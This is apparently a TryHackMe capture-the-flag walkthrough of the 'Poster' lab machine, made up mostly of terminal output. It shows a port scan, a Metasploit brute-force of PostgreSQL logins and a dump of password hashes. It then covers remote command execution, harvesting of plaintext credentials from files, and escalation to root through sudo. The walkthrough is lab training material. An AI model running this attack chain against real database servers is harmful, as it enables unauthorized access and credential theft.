- http://thm.box.ip
-
reveals an email signup box
-
the basic command injection that I tried didn't reveal anything.
- I used an actual email address and clicked sign up and nothing came to my inbox
What is the rdbms installed on the server?¶
What port is the rdbms running on?¶
- nmap scan to probe the box network reveals the rdbms postgresql running on port 5432
┌─(kali㉿kali)-[~] └─$ sudo nmap -p- -T4 -vv -O --min-rate 20000 -Pn 10.10.118.139 [sudo] password for kali: Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-14 03:24 EDT Initiating Parallel DNS resolution of 1 host. at 03:24 Completed Parallel DNS resolution of 1 host. at 03:24, 0.03s elapsed Initiating SYN Stealth Scan at 03:24 Scanning 10.10.118.139 [65535 ports] Discovered open port 22/tcp on 10.10.118.139 Discovered open port 80/tcp on 10.10.118.139 Increasing send delay for 10.10.118.139 from 0 to 5 due to 1669 out of 4171 dropped probes since last increase. Increasing send delay for 10.10.118.139 from 5 to 10 due to 817 out of 2041 dropped probes since last increase. Warning: 10.10.118.139 giving up on port because retransmission cap hit (6). Discovered open port 5432/tcp on 10.10.118.139 Completed SYN Stealth Scan at 03:24, 11.63s elapsed (65535 total ports) Initiating OS detection (try #1) against 10.10.118.139 Retrying OS detection (try #2) against 10.10.118.139 Retrying OS detection (try #3) against 10.10.118.139 Retrying OS detection (try #4) against 10.10.118.139 Retrying OS detection (try #5) against 10.10.118.139 Nmap scan report for 10.10.118.139 Host is up, received user-set (0.10s latency). Scanned at 2023-10-14 03:24:44 EDT for 24s Not shown: 61230 closed tcp ports (reset), 4302 filtered tcp ports (no-response) PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 61 80/tcp open http syn-ack ttl 61 5432/tcp open postgresql syn-ack ttl 61 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.94%E=4%D=10/14%OT=22%CT=1%CU=35795%PV=Y%DS=4%DC=I%G=Y%TM=652A42 OS:54%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)OP OS:S(O1=M509ST11NW7%O2=M509ST11NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST OS:11NW7%O6=M509ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)EC OS:N(R=Y%DF=Y%T=40%W=6903%O=M509NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F= OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5( OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z% OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C OS:D=S) Uptime guess: 0.013 days (since Sat Oct 14 03:07:03 2023) Network Distance: 4 hops TCP Sequence Prediction: Difficulty=264 (Good luck!) IP ID Sequence Generation: All zeros Read data files from: /usr/bin/../share/nmap OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.25 seconds Raw packets sent: 221522 (9.751MB) | Rcvd: 69886 (2.799MB)
After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the modules (starting with auxiliary)?¶
- fire up Metasploit - and searching for postgres
- auxiliary module that allows us to enumerate user credentials
-
9 auxiliary/scanner/postgres/postgres_login PostgreSQL Login Utility¶
msf6 > search postgres Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/server/capture/postgresql normal No Authentication Capture: PostgreSQL 1 post/linux/gather/enum_users_history normal No Linux Gather User History 2 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection 3 exploit/windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution 4 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection 5 auxiliary/analyze/crack_databases normal No Password Cracker: Databases 6 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution 7 exploit/multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution 8 auxiliary/scanner/postgres/postgres_dbname_flag_injection normal No PostgreSQL Database Name Command Line Flag Injection 9 auxiliary/scanner/postgres/postgres_login normal No PostgreSQL Login Utility -
use 9 - Set module to 9
- set -g rhosts ipaddr set the LHOSTS option globally across modules
msf6 > use 9 msf6 auxiliary(scanner/postgres/postgres_login) > options msf6 auxiliary(scanner/postgres/postgres_login) > set -g rhosts 10.10.78.111 sf6 auxiliary(scanner/postgres/postgres_login) > options Module options (auxiliary/scanner/postgres/postgres_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DATABASE template1 yes The database to authenticate against DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm) PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/pos no File containing passwords, one per line tgres_default_pass.txt Proxies no A proxy chain of format type:host:port[,type:host:port][...] RETURN_ROWSET true no Set to true to see query result sets RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas ploit.html RPORT 5432 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) USERNAME no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/pos no File containing (space-separated) users and passwords, one pair per line tgres_default_userpass.txt USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/pos no File containing users, one per line tgres_default_user.txt VERBOSE true yes Whether to print output for all attempts
What are the credentials you found?¶
- exploit / executes the module with the options you set
- reveals successful login with the credentials postgres:password
msf6 auxiliary(scanner/postgres/postgres_login) > exploit [!] No active DB -- Credential data will not be saved! [-] 10.10.51.200:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: postgres:postgres@template1 (Incorrect: Invalid username or password) [+] 10.10.51.200:5432 - Login Successful: postgres:password@template1 [-] 10.10.51.200:5432 - LOGIN FAILED: scott:@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: scott:tiger@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: scott:postgres@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: scott:password@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: scott:admin@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: admin:@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: admin:tiger@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: admin:postgres@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password) [-] 10.10.51.200:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?¶
- search for postgres
-
11 auxiliary/admin/postgres/postgres_sql¶
- This module will reveal the postgresql rdbms version installed
msf6 auxiliary(scanner/postgres/postgres_login) > search postgres Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/server/capture/postgresql normal No Authentication Capture: PostgreSQL 11 auxiliary/admin/postgres/postgres_sql normal No PostgreSQL Server Generic Query - use 11, options, set required fields user name and password
sf6 auxiliary(scanner/postgres/postgres_login) > use 11 msf6 auxiliary(admin/postgres/postgres_sql) > options Module options (auxiliary/admin/postgres/postgres_sql): Name Current Setting Required Description ---- --------------- -------- ----------- DATABASE template1 yes The database to authenticate against PASSWORD postgres no The password for the specified username. Leave blank for a random password. RETURN_ROWSET true no Set to true to see query result sets RHOSTS 10.10.51.200 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 5432 yes The target port SQL select version() no The SQL query to execute USERNAME postgres yes The username to authenticate as VERBOSE false no Enable verbose output msf6 auxiliary(admin/postgres/postgres_sql) > set username postgres username => postgres msf6 auxiliary(admin/postgres/postgres_sql) > set password password password => password - exploit
- reveals PostgreSQL 9.5.21 version
msf6 auxiliary(admin/postgres/postgres_sql) > exploit [*] Running module against 10.10.51.200 Query Text: 'select version()' ============================== version ------- PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit [*] Auxiliary module execution completed
What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?¶
-
15 auxiliary/scanner/postgres/postgres_hashdump¶
msf6 auxiliary(admin/postgres/postgres_sql) > search postgre Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/server/capture/postgresql normal No Authentication Capture: PostgreSQL 1 post/linux/gather/enum_users_history normal No Linux Gather User History 2 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection 3 exploit/windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution 4 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection 5 auxiliary/analyze/crack_databases normal No Password Cracker: Databases 6 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution 7 exploit/multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution 8 auxiliary/scanner/postgres/postgres_dbname_flag_injection normal No PostgreSQL Database Name Command Line Flag Injection 9 auxiliary/scanner/postgres/postgres_login normal No PostgreSQL Login Utility 10 auxiliary/admin/postgres/postgres_readfile normal No PostgreSQL Server Generic Query 11 auxiliary/admin/postgres/postgres_sql normal No PostgreSQL Server Generic Query 12 auxiliary/scanner/postgres/postgres_version normal No PostgreSQL Version Probe 13 exploit/linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution 14 exploit/windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution 15 auxiliary/scanner/postgres/postgres_hashdump normal No Postgres Password Hashdump - use #15 and check options
- set password to password
- and exploit
msf6 auxiliary(admin/postgres/postgres_sql) > use 15 msf6 auxiliary(scanner/postgres/postgres_hashdump) > options Module options (auxiliary/scanner/postgres/postgres_hashdump): Name Current Setting Required Description ---- --------------- -------- ----------- DATABASE postgres yes The database to authenticate against PASSWORD postgres no The password for the specified username. Leave blank for a random password. RHOSTS 10.10.51.200 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 5432 yes The target port THREADS 1 yes The number of concurrent threads (max one per host) USERNAME postgres yes The username to authenticate as - msf6 auxiliary(scanner/postgres/postgres_hashdump) > set password password
- password => password
How many user hashes does the module dump?¶
- 6
msf6 auxiliary(scanner/postgres/postgres_hashdump) > exploit [+] Query appears to have run successfully [+] Postgres Server Hashes ====================== Username Hash -------- ---- darkstart md58842b99375db43e9fdf238753623a27d poster md578fb805c7412ae597b399844a54cce0a postgres md532e12f215ba27cb750c9e093ce4b5127 sistemas md5f7dbc0d5a06653e74da6b1af9290ee2b ti md57af9ac4c593e9e4f275576e13f935579 tryhackme md503aab1165001c8f8ccae31a8824efddc [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?¶
-
10 auxiliary/admin/postgres/postgres_readfile¶
msf6 auxiliary(scanner/postgres/postgres_hashdump) > search postgres Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/server/capture/postgresql normal No Authentication Capture: PostgreSQL 1 post/linux/gather/enum_users_history normal No Linux Gather User History 2 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection 3 exploit/windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution 4 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection 5 auxiliary/analyze/crack_databases normal No Password Cracker: Databases 6 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution 7 exploit/multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution 8 auxiliary/scanner/postgres/postgres_dbname_flag_injection normal No PostgreSQL Database Name Command Line Flag Injection 9 auxiliary/scanner/postgres/postgres_login normal No PostgreSQL Login Utility 10 auxiliary/admin/postgres/postgres_readfile normal No PostgreSQL Server Generic Query
What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?¶
-
6 exploit/multi/postgres/postgres_copy_from_program_cmd_exec¶
msf6 > search postgres Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/server/capture/postgresql normal No Authentication Capture: PostgreSQL 1 post/linux/gather/enum_users_history normal No Linux Gather User History 2 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection 3 exploit/windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution 4 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection 5 auxiliary/analyze/crack_databases normal No Password Cracker: Databases 6 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution
Compromise the machine and locate user.txt¶
- using exploit/multi/postgres/postgres_copy_from_program_cmd_exec
- set username to postgres
- set password to password
- set lhost to tun0
cat /etc/passwd reveals users Alison and Dark ```bash postgres@ubuntu:/var/lib/postgresql/9.5/main$ cat /etc/passwd cat /etc/passwd #/home/dark/credentials.txt root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync ... uuidd:x:107:111::/run/uuidd:/bin/false alison:x:1000:1000:Poster,,,:/home/alison:/bin/bash sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin postgres:x:109:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash dark:x:1001:1001::/home/dark: - Alison has user.txt in their home dir but permission denied to postgres user
-
following command to search system for user.txt and send 'permission denied' to garbage
postgres@ubuntu:/var/lib/postgresql/9.5/main$ find / -name user.txt 2>/dev/null <stgresql/9.5/main$ find / -name user.txt 2>/dev/null /home/alison/user.txt -
Dark has credentials.txt in their home dir with contents qwerty1234#!hackme
-
su dark:qwerty1234#!hackme
postgres@ubuntu:/home/dark$ cat credentials.txt cat credentials.txt dark:qwerty1234#!hackme -
sudo -l no root permissions
dark@ubuntu:~$ sudo -l sudo -l [sudo] password for dark: qwerty1234#!hackme Sorry, user dark may not run sudo on ubuntu. -
enumerating what dark has access to
-
find / -user dark 2>/dev/null find | grep -v '/proc'
dark@ubuntu:~$ find / -user dark 2>/dev/null | grep -v '/proc' find / -user dark 2>/dev/null | grep -v '/proc' /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/tasks /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/cgroup.procs /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/tasks /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.procs /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.clone_children /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/notify_on_release /home/dark /home/dark/.bashrc /home/dark/.bash_logout /home/dark/.profile /home/dark/.bash_history /home/dark/credentials.txt /run/user/1001 /run/user/1001/systemd /run/user/1001/systemd/private /run/user/1001/systemd/notify -
find / -group dark 2>/dev/null
dark@ubuntu:~$ find / -group dark 2>/dev/null | grep -v '/proc' find / -group dark 2>/dev/null | grep -v '/proc' /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/tasks /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/cgroup.procs /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/tasks /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.procs /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.clone_children /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/notify_on_release /home/dark /home/dark/.bashrc /home/dark/.bash_logout /home/dark/.profile /home/dark/.bash_history /home/dark/credentials.txt /run/user/1001 /run/user/1001/systemd /run/user/1001/systemd/private /run/user/1001/systemd/notify -
digging around like a blind man looking for nickel
- /var/www/html/config.php
-
reveals alison's password, shame shame we know your name.
ark@ubuntu:/var/lib/postgresql$ cat /var/www/html/config.php cat /var/www/html/config.php <?php $dbhost = "127.0.0.1"; $dbuname = "alison"; $dbpass = "p4ssw0rdS3cur3!#"; $dbname = "mysudopassword"; -
using password to login to Alison
dark@ubuntu:/var/lib/postgresql$ su alison su alison Password: p4ssw0rdS3cur3!# alison@ubuntu:/var/lib/postgresql$ cat /home/alison/user.txt cat /home/alison/user.txt THM{postgresql_fa1l_conf1gurat1on} -
using sudo -l to reveal Alison's sudo permisisons reveal that Alison can run sudo commands
alison@ubuntu:/var/lib/postgresql$ sudo -l sudo -l [sudo] password for alison: p4ssw0rdS3cur3!# Matching Defaults entries for alison on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User alison may run the following commands on ubuntu: (ALL : ALL) ALL alison@ubuntu:/$ sudo su sudo su root@ubuntu:/# root@ubuntu:/# cd root cd root root@ubuntu:~# ls -aslp ls -aslp total 24 4 drwx------ 3 root root 4096 Jul 28 2020 ./ 4 drwxr-xr-x 22 root root 4096 Jul 28 2020 ../ 4 -rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc 4 drwxr-xr-x 2 root root 4096 Jul 28 2020 .nano/ 4 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile 4 -rw-r--r-- 1 root root 49 Jul 28 2020 root.txt root@ubuntu:~# cat root.txt cat root.txt THM{c0ngrats_for_read_the_f1le_w1th_credent1als}